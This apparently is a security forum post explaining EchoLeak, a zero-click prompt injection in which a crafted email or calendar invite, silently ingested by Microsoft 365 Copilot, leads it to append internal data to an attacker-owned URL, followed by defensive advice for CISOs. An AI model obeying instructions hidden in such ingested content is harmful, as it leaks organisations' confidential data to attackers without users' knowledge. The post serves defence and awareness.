Last week, we saw the first confirmed zero click prompt injection breach against a production AI assistant.
No malware. No links to click. No user interaction.
Just a cleverly crafted email quietly triggering Microsoft 365 Copilot to leak sensitive org data as part of its intended behaviour.
Here’s how it worked:
• The attacker sent a benign-looking email or calendar invite
• Copilot ingested it automatically as background context
• Hidden inside was markdown-crafted prompt injection
• Copilot responded by appending internal data into an external URL owned by the attacker
• All of this happened without the user ever opening the email
This is CVE 2025 32711 (EchoLeak). Severity 9.3
Let that sink in. The AI assistant did exactly what it was designed to do. It read context, summarized, assisted. But with no guardrails on trust boundaries, it blended attacker inputs with internal memory.
This wasn’t a user mistake. It wasn’t a phishing scam. It was a design flaw in the AI data pipeline itself.
🧠 The Novelty
What makes this different from prior prompt injection?
1. Zero click. No action by the user. Sitting in the inbox was enough
2. Silent execution. No visible output or alerts. Invisible to the user and the SOC
3. Trusted context abuse. The assistant couldn’t distinguish between hostile inputs and safe memory
4. No sandboxing. Context ingestion, generation, and network response occurred in the same flow
This wasn’t just bad prompt filtering. It was the AI behaving correctly in a poorly defined system.
🔐 Implications
For CISOs, architects, and Copilot owners - read this twice.
→ You must assume all inputs are hostile, including passive ones
→ Enforce strict context segmentation. Copilot shouldn’t ingest emails, chats, docs in the same pass
→ Treat prompt handling as a security boundary, not just UX
→ Monitor agent output channels like you would outbound APIs
→ Require your vendors to disclose what their AI sees and what triggers it
🧭 Final Thought
The next wave of breaches won’t look like malware or phishing.
They will look like AI tools doing exactly what they were trained to do
but in systems that never imagined a threat could come from within a calendar invite.
Patch if you must. But fix your AI architecture before the next CVE hits.
Regards
Caute_Cautim